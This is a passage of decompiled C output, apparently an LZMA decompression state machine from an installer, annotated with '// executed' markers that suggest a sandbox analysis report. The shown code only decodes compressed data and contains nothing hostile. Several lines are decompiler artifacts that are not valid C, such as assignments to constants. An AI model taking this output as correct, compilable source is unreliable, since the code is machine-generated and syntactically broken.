												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
